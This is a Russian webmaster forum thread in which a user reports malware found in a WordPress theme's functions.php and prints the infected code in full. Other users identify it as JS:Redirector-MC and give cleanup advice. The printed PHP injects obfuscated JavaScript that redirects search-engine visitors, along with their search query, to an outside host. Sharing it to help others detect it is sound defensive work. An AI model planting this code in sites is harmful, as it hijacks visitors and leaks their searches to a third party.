X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Обнаружил вирус в functions.php на WordPress
GreenMan
GreenMan
Topic Starter сообщение 19.3.2012, 12:54; Ответить: GreenMan
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 444
Регистрация: 28.6.2011
Из: Home
Поблагодарили: 80 раз
Репутация:   12  


Сегодня зашел в панель Я.вебмастер и увидел, что на двух моих сайтах обнаружен вредоносный код.
"WTF?" - подумал я, на сайтах кроме ротатора ad1.ru ничего больше нет. Сайты на WordPress.
Захожу на сайты - да все верно, блокирует мой NOD32, значит что-то все таки не так. Порылся я в админке, теме, посмотрел исходный код, но ничего "левого" не увидел.
Тогда я скачал дамп файлов сайта и проверил его на вирусы NOD32. Оказалось, что в теме в functions.php был вот такой милый код:
Развернуть/Свернуть
<?php
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){            
                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati
o
n'.split('|'),0,{}))</script>";
            }
        }
    }
?>

Этот код оказался и еще на одном сайте, где стояла такая же тема.
Удалил его - все нормально теперь, NOD32 не блокирует, Яндекс тоже "не выявил потенциально опасного кода".
Вроде бы и хэппи-энд, но мне интересно как он туда попал? Как обезопасить сайт от повторного взлома или что это было? У вас было такое?
Делюсь с вами, чтобы тоже имели ввиду, где может сидеть вирус.


--------------------
- вэбмастер-энтузиаст -
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
paranormal
paranormal
сообщение 19.3.2012, 13:00; Ответить: paranormal
Сообщение #2


ПаранормалЪ
******

Группа: Super Moderator
Сообщений: 1068
Регистрация: 27.1.2011
Поблагодарили: 1943 раза
Репутация:   138  


Эта дрянь может вернуться. Посмотрите в 2х стандартных темах, которые вшиты в ВП и во всех остальных в папке /themes в томже файле functions.php. Очень часто после заражения вредорносный код есть и там.

Сообщение отредактировал paranormal - 19.3.2012, 13:13


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alex2906
alex2906
сообщение 19.3.2012, 16:49; Ответить: alex2906
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 318
Регистрация: 25.8.2010
Поблагодарили: 101 раз
Репутация:   16  


Это JS:Redirector-MC [Trj], мучился неделю, почищу, через сутки опять есть. Прописывается в самом низу functions.php.
Обнови свою тему, можно еще выставить права на functions.php - 444 (только чтение), мне помогло. Ну и не активные темы тоже проверить надо.


--------------------
Гугли - гуглОм и не яндекси всуе.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreenMan
GreenMan
Topic Starter сообщение 19.3.2012, 17:54; Ответить: GreenMan
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 444
Регистрация: 28.6.2011
Из: Home
Поблагодарили: 80 раз
Репутация:   12  


(alex2906 @ 19.3.2012, 15:49) *
Это JS:Redirector-MC [Trj], мучился неделю, почищу, через сутки опять есть. Прописывается в самом низу functions.php.
Обнови свою тему, можно еще выставить права на functions.php - 444 (только чтение), мне помогло. Ну и не активные темы тоже проверить надо.

Да, так его NOD32 и назвал.
Спасибо, буду пробовать.


--------------------
- вэбмастер-энтузиаст -
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
style93
style93
сообщение 21.3.2012, 0:21; Ответить: style93
Сообщение #5


Частый гость
**

Группа: User
Сообщений: 59
Регистрация: 17.2.2012
Из: Украина
Поблагодарили: 4 раза
Репутация:   5  


а вы не помните с какого сайта качали??знаюю мне знакомый рассказывал была та же проблема, скачал фри тему , помогло только то, что скачал такую же но с другого сайта...Советую сделать также


--------------------
77090
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 21.3.2012, 2:07; Ответить: Electric
Сообщение #6


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Не качайте "супер премиум темы" с левых сайтов. Качайте их с официального сайта ВП или заказывайте у профи.
Советую проверить сайты по ФТП на наличие шеллов, так как ситуация может повторится.
http://www.maultalk.com/topic116023.html - советы по чистке и профилактике.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1123 Вчера, 23:36
автор: Nell
Открытая тема (нет новых ответов) Недорогие услуги - php/js/mysql/jquery/bootstrap
2 vlads 646 Вчера, 21:01
автор: vlads
Горячая тема (нет новых ответов) Вёрстка, натяжка на WordPress, Joomla, качественно, доступно
53 WhiteIce 23755 12.12.2017, 19:41
автор: WhiteIce
Горячая тема (нет новых ответов) Разработка сайтов Joomla Wordpress Opencart
Разработка, верстка, оптимизация веб сайтов.
48 WoWeb 7335 12.12.2017, 13:37
автор: serg5777
Открытая тема (нет новых ответов) Веб-разработка (HTML5, CSS3, JavaScript, jQuery, Ajax, PHP)
18 qpPeW 3383 12.12.2017, 13:32
автор: qpPeW


 



RSS Текстовая версия Сейчас: 14.12.2017, 14:13
Дизайн